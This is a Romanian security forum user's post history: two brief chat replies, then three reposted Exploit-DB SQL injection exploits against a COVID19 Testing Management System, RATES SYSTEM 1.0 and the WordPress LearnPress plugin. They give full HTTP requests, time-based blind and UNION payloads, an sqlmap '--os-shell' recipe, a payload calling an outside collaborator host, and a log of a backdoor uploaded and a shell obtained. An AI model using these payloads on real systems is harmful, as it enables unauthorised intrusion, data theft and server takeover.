Jump to content

GabrielRo

Members
  • Posts

    23
  • Joined

  • Last visited

  • Days Won

    2

Posts posted by GabrielRo

  1. 54 minutes ago, 0xStrait said:

    Salut, nu poti sti niciodata 100% daca un fisier este sau nu malitios (doar daca analizezi executabilul). Toate site-urile gen virustotal si altele, primesc defapt "alerte" de la diferite servicii/antivirusi cum (,) ca fisierul cu hash-ul respectiv contine "virus". Cel mai bine ruleaza intr-o masina virtuala, fara conexiune la internet. Se poate trece si de masina virtuala (guest to host escape), dar aici nu cred ca e cazul.

     

    Rezultatele par sa fie OK, hybrid-analysis - posibil false-positive 

     

    Mult succes!

    Mulțumesc, succes și ție. 

  2. 5 hours ago, Nytro said:

    Salut, mie mi se pare o mare porcarie. Intr-adevar, poate ai sanse mai mari acolo sa gasesti cine stie ce droguri sau alte porcarii, dar in afara de asta nu e util la nimic. 

    Astept si eu niste pareri diferite, poate ma insel. Referitor la "hacking", am gasit doar mizerii de acum 30 de ani parca scrise de copii de 12 ani in pauzele de la CS:GO. 

     

    Asa este, totul ce se găsește aici public, găsești și acolo.. surse bubuite de Botnet IRC  Rxbot, de la programe scrise în Visual Basic  Dos Attack. 

  3. Vulnerable App:
     
    # Exploit Title: COVID19 Testing Management System 1.0 - 'searchdata' SQL Injection
    # Google Dork: intitle: "COVID19 Testing Management System"
    # Date: 09/08/2021
    # Exploit Author: Ashish Upsham
    # Vendor Homepage: https://phpgurukul.com
    # Software Link: https://phpgurukul.com/covid19-testing-management-system-using-php-and-mysql/
    # Version: v1.0
    # Tested on: Windows
    
    Description:
    
    The COVID19 Testing Management System 1.0 application from PHPgurukul is vulnerable to
    SQL injection via the 'searchdata' parameter on the patient-search-report.php page.
    
    ==================== 1. SQLi ====================
    
    http://192.168.0.107:80/covid-tms/patient-search-report.php
    
    The "searchdata" parameter is vulnerable to SQL injection, it was also tested, and a un-authenticated
    user has the full ability to run system commands via --os-shell and fully compromise the system
    
    POST parameter 'searchdata' is vulnerable.
    
    step 1 : Navigate to the "Test Report >> Search Report" and enter any random value & capture the request in the proxy tool.
    step 2 : Now copy the post request and save it as test.txt file.
    step 3 : Run the sqlmap command "sqlmap -r test.txt -p searchdata --os-shell"
    
    ----------------------------------------------------------------------
    Parameter: searchdata (POST)
        Type: time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
        Payload: searchdata=809262'+(select load_file('yhj3lhp8nhgr0sb7nf7ma0d0wr2hq6.burpcollaborator.net'))+'') AND (SELECT 4105 FROM (SELECT(SLEEP(5)))BzTl) AND ('Rxmr'='Rxmr&search=Search
    
        Type: UNION query
        Title: Generic UNION query (NULL) - 5 columns
        Payload: searchdata=809262'+(select load_file('yhj3lhp8nhgr0sb7nf7ma0d0wr2hq6.burpcollaborator.net'))+'') UNION ALL SELECT NULL,NULL,CONCAT(0x716a767071,0x59514b74537665486a414263557053556875425a6543647144797a5a497a7043766e597a484e6867,0x7176767871),NULL,NULL,NULL,NULL-- -&search=Search
    
    [19:14:14] [INFO] trying to upload the file stager on '/xampp/htdocs/' via UNION method
    [19:14:14] [INFO] the remote file '/xampp/htdocs/tmpuptfn.php' is larger (714 B) than the local file '/tmp/sqlmap_tng5cao28/tmpaw4yplu2' (708B)
    [19:14:14] [INFO] the file stager has been successfully uploaded on '/xampp/htdocs/' - http://192.168.0.107:80/tmpuptfn.php
    [19:14:14] [INFO] the backdoor has been successfully uploaded on '/xampp/htdocs/' - http://192.168.0.107:80/tmpbmclp.php[19:14:14] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTER
    os-shell> whoami
    do you want to retrieve the command standard output? [Y/n/a] y
    command standard output:  'laptop-ashish\ashish'
    os-shell>

     

    Sursa: https://www.exploit-db.com/exploits/50190

    • Upvote 1
  4. Vulnerable App:
     
    # Exploit Title: RATES SYSTEM 1.0 - 'Multiple' SQL Injections
    # Date: 11-08-2021
    # Exploit Author: Halit AKAYDIN (hLtAkydn)
    # Software Link: https://www.sourcecodester.com/php/14904/rates-system.html
    # Version: V1.0
    # Category: Webapps
    # Tested on: Linux/Windows
    
    # Description:
    # PHP Dashboards is prone to an SQL-injection vulnerability
    # because it fails to sufficiently sanitize user-supplied data before using
    # it in an SQL query.Exploiting this issue could allow an attacker to
    # compromise the application, access or modify data, or exploit latent
    # vulnerabilities in the underlying database.
    
    # Vulnerable Request:
    
    POST /register.php HTTP/1.1
    Host: localhost
    Content-Length: 70
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    Origin: http://localhost
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Referer: http://localhost/register.php
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
    Cookie: PHPSESSID=rou48ptlhqkrlt68jpd9ugndgf
    Connection: close
    
    ClientId=0001&email=hltakydn%40pm.me&pwd1=123456&pwd2=123456&register=
    
    # Vulnerable Payload:
    # Parameter: ClientId (POST)
    # Type: time-based blind
    # Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    # Payload:
    
    ClientId=ojEY' AND (SELECT 4947 FROM (SELECT(SLEEP(10)))haeq) AND 'mdgj'='mdgj&email=&pwd1=iYkb&pwd2=&register=oQCR
    
    --------------------------------------------------------------------------------------------------------------------------
    
    # Vulnerable Request:
    
    POST /passwordreset.php HTTP/1.1
    Host: localhost
    Content-Length: 61
    Cache-Control: max-age=0
    sec-ch-ua: ";Not A Brand";v="99", "Chromium";v="88"
    sec-ch-ua-mobile: ?0
    Upgrade-Insecure-Requests: 1
    Origin: http://localhost
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Referer: http://localhost/passwordreset.php
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
    Cookie: PHPSESSID=a8600labr48ehj6d8716ho0h61
    Connection: close
    
    loginId=1&clientId=1&email=hltakydn%40pm.me&pwd=123456&reset=
    
    # Vulnerable Payload:
    # Parameter: loginId (POST)
    # Type: time-based blind
    # Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    # Payload:
    
    loginId=FPDr' AND (SELECT 4535 FROM (SELECT(SLEEP(10)))SJvL) AND 'rtGr'='rtGr&clientId=&email=VXzw&pwd=&reset=xlcX

     

     

    Sursa: https://www.exploit-db.com/exploits/50192

    • Upvote 1
  5. # Exploit Title: WordPress Plugin LearnPress 3.2.6.7 - 'current_items' SQL Injection (Authenticated)
    # Date: 07-17-2021
    # Exploit Author: nhattruong or nhattruong.blog
    # Vendor Homepage: https://thimpress.com/learnpress/
    # Software Link: https://wordpress.org/plugins/learnpress/
    # Version: < 3.2.6.8
    # References link: https://wpscan.com/vulnerability/10208
    # CVE: CVE-2020-6010

    POC:
    1. Go to url http://<host>/wp-admin
    2. Login with a cred
    3. Execute the payload


    POST /wordpress/wp-admin/post-new.php?post_type=lp_order HTTP/1.1
    Host: localhost
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
    Accept: application/json, text/plain, */*
    Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate
    Referer: http://localhost/wordpress/wp-admin/post-new.php?post_type=lp_order
    Content-Type: application/x-www-form-urlencoded
    X-Requested-With: XMLHttpRequest
    Content-Length: 128
    Origin: http://localhost
    Connection: close
    Cookie: wordpress_bbfa5b726c6b7a9cf3cda9370be3ee91=test%7C1626703944%7Ch5yJTmZF2VUp6nuZHvt3WpWHJOGpYRUwaDfRNLd8N3x%7Cf0e96afd20e39e4531756b321160a4929f82f20a3fed8d3c3b682e0ece232e08; wordpress_test_cookie=WP+Cookie+check; wp_learn_press_session_bbfa5b726c6b7a9cf3cda9370be3ee91=80e1cb27266ae862f9e71f90a987f260%7C%7C1626703938%7C%7Cbd6b88d1ae5fd4354f09534ad4971bbc; wordpress_logged_in_bbfa5b726c6b7a9cf3cda9370be3ee91=test%7C1626703944%7Ch5yJTmZF2VUp6nuZHvt3WpWHJOGpYRUwaDfRNLd8N3x%7Ce1092ef2869397bd9701ca7f1c6d0399c89459f5221db89c48a53b39b3e8cc2f; wp-settings-time-3=1626531145

    type=lp_course&context=order-items&context_id=32&term=+test&paged=1&lp-ajax=modal_search_items&current_items[]=1 or sleep(1)-- -

    # Modify current_items[] as you want   

     

     

     

    Sursahttps://www.exploit-db.com/exploits/50137

    • Upvote 1
×
×
  • Create New...